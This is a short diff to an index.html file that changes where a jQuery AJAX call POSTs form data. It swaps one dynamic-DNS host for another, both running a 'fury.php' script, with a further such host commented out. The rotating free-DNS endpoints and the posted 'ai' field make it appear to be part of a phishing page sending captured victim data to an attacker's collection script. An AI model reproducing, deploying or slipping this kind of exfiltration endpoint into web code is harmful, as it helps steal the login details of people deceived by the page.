--- a/index.html
+++ b/index.html
@@ -181,7 +181,7 @@ $(document).ready(function() {
         $.ajax({
             dataType: 'JSON',
             //url:'https://twotwofive.cloudns.ph/fury.php',
-            url: 'http://phpreporter.duckdns.org/fury.php',
+            url: 'https://bashphilez.cloudns.ph/fury.php',
             type: 'POST',
             data: {
                 ai: ai,
